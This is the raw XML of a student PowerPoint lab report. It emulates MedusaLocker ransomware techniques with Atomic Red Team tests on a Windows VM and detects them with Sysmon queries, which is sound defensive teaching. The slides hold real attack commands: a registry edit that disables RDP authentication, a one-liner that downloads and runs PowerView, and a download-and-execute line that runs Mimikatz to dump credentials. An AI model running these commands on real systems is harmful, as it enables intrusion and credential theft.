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B2FA9F-17A2-4469-BE8F-5E5836611D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62BA-6317-4893-AB17-C443B0173D8C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28AF-D3E1-4D24-B8DC-99CD57C30C6A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009-16CC-46CA-BDB4-F9CD31C7023B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CAA6-CEC4-4299-965E-494374F8A4AC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914-2680-46B5-908A-9F31A98DC89D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2D9DDEBB-39D8-49F9-B69B-0ACB3110EF73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2E81-6EEB-4882-92C5-D630F2F9A245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659-CD0F-42B4-8A47-FD3B17567DA8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50-68E9-4FD6-935C-3DF853E1165D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0E5616-76C2-4183-ACDF-FFB9D459ECEF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canaryco/atomic-red-tea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BF45EA0-160C-6852-4D0A-EC8038A7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96" r="9091" b="360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59AC-C691-9092-09F4-50F1A971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5600"/>
              <a:t>Peer Programming: Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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F951-4545-3E50-36FB-4CAB1053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Ujjwal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Dhakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> (12222900)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1900" dirty="0"/>
              <a:t>Tanisha Mani Oishi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15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T1018</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tactic: Discovery [Remote System Discovery]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command lists other IP addresses, hostname, etc. to get access remotely . The command to emulate a benign attack on PowerShell is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:b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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.ServicePointManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SecurityProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.SecurityProtocolType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]::Tls12IEX (IWR 'https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShellMafia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PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/master/Recon/PowerView.ps1' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UseBasicParsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DomainController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -verbose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this command from running due to malicious materials)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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *Sysmon* | where message -like *T1018* | select -first 1 | Format-List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7424-C8D7-7A7B-D118-C4F5392C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93558"/>
            <a:ext cx="5737543" cy="3992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76D82-C72A-87CE-0E3A-76A6096D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01" y="1993557"/>
            <a:ext cx="5021182" cy="39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30F-D042-4338-A98A-41FA7740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1A75-A408-4CC5-424B-AFCC777D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8DD3-216C-08C4-BE60-D132C0CF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A5D4-0EC5-6DC5-3026-398453A0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6E0F-74FF-BFB9-265A-ECF9FDB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949-23C4-0DC8-59FD-D9B4BE3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A481-7671-A7EE-3F20-B647A585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F08-6BB6-1EF1-D7F0-E1E58E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CDFA-8263-16CA-823F-FF505E3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B209-E7DB-B4F0-6B56-FE68255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2A29-DB70-CAA0-C349-7D89078A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8CF7-928D-A8E6-1C9B-DFD4CC23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C0BE-A9E0-8792-4DB6-129651D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977F-F6C7-ECFD-EFE0-82B6566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8289-A672-DA88-9964-F68FC17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Picture 7" descr="A purple pawn and a rolling dice">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E66158-6D64-19BD-D513-4A644849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6246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34933-32DE-4846-4AF3-F4D1FDF4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Task 4: Emulating an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D82CF-A321-8EA7-664D-3FD9B90BA635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517871" y="2578608"/>
            <a:ext cx="4672966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Goals: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Search different types of attack techniques used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MedusaLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Ransomware.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Emulate a benign attack on Win22 virtual machine referencing attack codes from  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/redcanaryco/atomic-red-team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Use Sysmon Detection to detect the details of such attacks in the system.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CAC-8E36-9D76-F762-264E725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18/05/2024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73D6-3C1B-7A5E-9058-069B238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E426-13EC-8C18-6A1C-27F5F57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T1021</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tactic: Remote Services [Remote Desktop Control]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The command to emulate a benign attack which tries to log into the computer using Remote Desktop Protocol (RDP)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PS C:\Users\vagrant&gt; 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reg add "HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Control\Terminal Server\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinStations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\RDP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /d 0 /t REG_DWORD /f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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *Sysmon* | where message -like *T1021*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219" y="657369"/>
            <a:ext cx="4528232" cy="552297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9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DD14526-DA32-A8BA-1C20-5B118C77A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831" y="2215881"/>
            <a:ext cx="5515396" cy="3377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A9BC7A-8A43-801D-F7C9-356D454FF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869" y="2215880"/>
            <a:ext cx="5515396" cy="337720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T1059.001</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tactic: Execution [Command and Scripting Interpreter: Power</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Shell]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attack abuses PowerShell commands and scripts for execution. The command to emulate a benign attack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PS C:\Users\vagrant&gt;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powershell.exe "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('#{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mimurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}'); Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DumpCreds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the PowerShell to run the command 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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *Sysmon* | where message -like *T1059.001*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38043-E4E4-CBEE-2058-36B05BEA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08" y="1993558"/>
            <a:ext cx="5021184" cy="38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A941B8-8BDC-BE05-46EE-AF955E23F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" y="1894703"/>
            <a:ext cx="5727700" cy="3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82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Neue Haas Grotesk Text Pro</vt:lpstr>
      <vt:lpstr>GestaltVTI</vt:lpstr>
      <vt:lpstr>Peer Programming: Attack</vt:lpstr>
      <vt:lpstr>Task 1:</vt:lpstr>
      <vt:lpstr>Task 2:</vt:lpstr>
      <vt:lpstr>Task 3:</vt:lpstr>
      <vt:lpstr>Task 4: Emulating an attack</vt:lpstr>
      <vt:lpstr>ATT&amp;CK ID : T1021 Tactic: Remote Services [Remote Desktop Control]  The command to emulate a benign attack which tries to log into the computer using Remote Desktop Protocol (RDP) on PowerShell is:  PS C:\Users\vagrant&gt;  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f  (Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)  For Sysmon Detection we use the following code:  Get-WinEvent *Sysmon* | where message -like *T1021* | select -first 1 | Format-List </vt:lpstr>
      <vt:lpstr>Screenshots of Attack</vt:lpstr>
      <vt:lpstr>ATT&amp;CK ID : T1059.001 Tactic: Execution [Command and Scripting Interpreter: Power Shell]  This attack abuses PowerShell commands and scripts for execution. The command to emulate a benign attack on PowerShell is:  PS C:\Users\vagrant&gt;  powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"  (Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)  ( Note: During execution device’s antivirus software blocked the PowerShell to run the command )  For Sysmon Detection we use the following code:  Get-WinEvent *Sysmon* | where message -like *T1059.001* | select -first 1 | Format-List </vt:lpstr>
      <vt:lpstr>Screenshots of Attack</vt:lpstr>
      <vt:lpstr>ATT&amp;CK ID : T1018 Tactic: Discovery [Remote System Discovery]  This command lists other IP addresses, hostname, etc. to get access remotely . The command to emulate a benign attack on PowerShell is:  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose  (Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)  ( Note: During execution device’s antivirus software blocked this command from running due to malicious materials)  For Sysmon Detection we use the following code:  Get-WinEvent *Sysmon* | where message -like *T1018* | select -first 1 | Format-List</vt:lpstr>
      <vt:lpstr>Screenshots of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Programming: Attack</dc:title>
  <dc:creator>abishek dues</dc:creator>
  <cp:lastModifiedBy>abishek dues</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T19:06:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T20:43:29Z</dcterms:modified>
</cp:coreProperties>
</file>